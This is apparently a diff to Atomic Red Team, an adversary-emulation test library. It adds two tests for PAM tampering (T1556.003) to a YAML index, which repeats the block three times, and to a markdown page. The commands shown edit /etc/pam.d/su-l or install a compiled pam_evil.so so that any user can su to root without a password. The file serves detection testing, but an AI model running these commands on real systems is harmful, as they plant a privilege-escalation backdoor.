| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
| | | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) | | | | | | | |
| | | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | |
| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
@@ -101,7 +101,7 @@
| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | |
| | | [Trap](../../T1546.005/T1546.005.md) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Trap](../../T1546.005/T1546.005.md) | | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | | | | | | | |
| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Web Shell](../../T1505.003/T1505.003.md) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+282 -3
@@ -5148,7 +5148,100 @@ credential-access:
x_mitre_platforms:
- Linux
- macOS
atomic_tests: []
identifier: T1556.003
atomic_tests:
- name: Malicious PAM rule
auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c
description: |
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su-l"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 1
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
description: |
Creates a PAM module, inserts a rule to use it, and then tests it.
Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su-l"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient /tmp/pam_evil.so
index:
description: Index where the rule is inserted.
type: integer
default: 1
path_to_pam_module_source:
description: Path to PAM module source code.
type: path
default: PathToAtomicsFolder/T1556.003/src/pam_evil.c
path_to_pam_module:
description: Path to PAM module object
type: path
default: "/tmp/pam_evil.so"
dependencies:
- description: 'The PAM development library must be installed to build the PAM
module
'
prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
0; else exit 1; fi;
'
get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
fi
'
- description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
'
prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
fi;
'
get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
'
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
T1552.004:
technique:
id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf
@@ -31787,7 +31880,100 @@ defense-evasion:
x_mitre_platforms:
- Linux
- macOS
atomic_tests: []
identifier: T1556.003
atomic_tests:
- name: Malicious PAM rule
auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c
description: |
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su-l"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 1
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
description: |
Creates a PAM module, inserts a rule to use it, and then tests it.
Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su-l"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient /tmp/pam_evil.so
index:
description: Index where the rule is inserted.
type: integer
default: 1
path_to_pam_module_source:
description: Path to PAM module source code.
type: path
default: PathToAtomicsFolder/T1556.003/src/pam_evil.c
path_to_pam_module:
description: Path to PAM module object
type: path
default: "/tmp/pam_evil.so"
dependencies:
- description: 'The PAM development library must be installed to build the PAM
module
'
prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
0; else exit 1; fi;
'
get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
fi
'
- description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
'
prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
fi;
'
get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
'
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
T1205.001:
technique:
external_references:
@@ -44678,7 +44864,100 @@ persistence:
x_mitre_platforms:
- Linux
- macOS
atomic_tests: []
identifier: T1556.003
atomic_tests:
- name: Malicious PAM rule
auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c
description: |
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su-l"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient pam_succeed_if.so uid >= 0
index:
description: Index where the rule is inserted.
type: integer
default: 1
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
description: |
Creates a PAM module, inserts a rule to use it, and then tests it.
Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
supported_platforms:
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
type: string
default: "/etc/pam.d/su-l"
pam_rule:
description: Rule to add to the PAM config.
type: string
default: auth sufficient /tmp/pam_evil.so
index:
description: Index where the rule is inserted.
type: integer
default: 1
path_to_pam_module_source:
description: Path to PAM module source code.
type: path
default: PathToAtomicsFolder/T1556.003/src/pam_evil.c
path_to_pam_module:
description: Path to PAM module object
type: path
default: "/tmp/pam_evil.so"
dependencies:
- description: 'The PAM development library must be installed to build the PAM
module
'
prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
0; else exit 1; fi;
'
get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
fi
'
- description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
'
prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
fi;
'
get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
'
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
'
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
'
T1205.001:
technique:
external_references:
+120
@@ -0,0 +1,120 @@
# T1556.003 - Pluggable Authentication Modules
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1556/003)
<blockquote>Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
Adversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)</blockquote>
## Atomic Tests
- [Atomic Test #1 - Malicious PAM rule](#atomic-test-1---malicious-pam-rule)
- [Atomic Test #2 - Malicious PAM module](#atomic-test-2---malicious-pam-module)
<br/>
## Atomic Test #1 - Malicious PAM rule
Inserts a rule into a PAM config and then tests it.
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
**Supported Platforms:** Linux
**auto_generated_guid:** 4b9dde80-ae22-44b1-a82a-644bf009eb9c
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l|
| pam_rule | Rule to add to the PAM config. | string | auth sufficient pam_succeed_if.so uid >= 0|
| index | Index where the rule is inserted. | integer | 1|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
```
#### Cleanup Commands:
```sh
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
```
<br/>
<br/>
## Atomic Test #2 - Malicious PAM module
Creates a PAM module, inserts a rule to use it, and then tests it.
Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
**Supported Platforms:** Linux
**auto_generated_guid:** 65208808-3125-4a2e-8389-a0a00e9ab326
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l|
| pam_rule | Rule to add to the PAM config. | string | auth sufficient /tmp/pam_evil.so|
| index | Index where the rule is inserted. | integer | 1|
| path_to_pam_module_source | Path to PAM module source code. | path | PathToAtomicsFolder/T1556.003/src/pam_evil.c|
| path_to_pam_module | Path to PAM module object | path | /tmp/pam_evil.so|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
```
#### Cleanup Commands:
```sh
sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
```
#### Dependencies: Run with `sh`!
##### Description: The PAM development library must be installed to build the PAM module
##### Check Prereq Commands:
```sh
if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi
```
##### Description: The PAM module must exist on disk at specified location (#{path_to_pam_module})
##### Check Prereq Commands:
```sh
if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
```
<br/>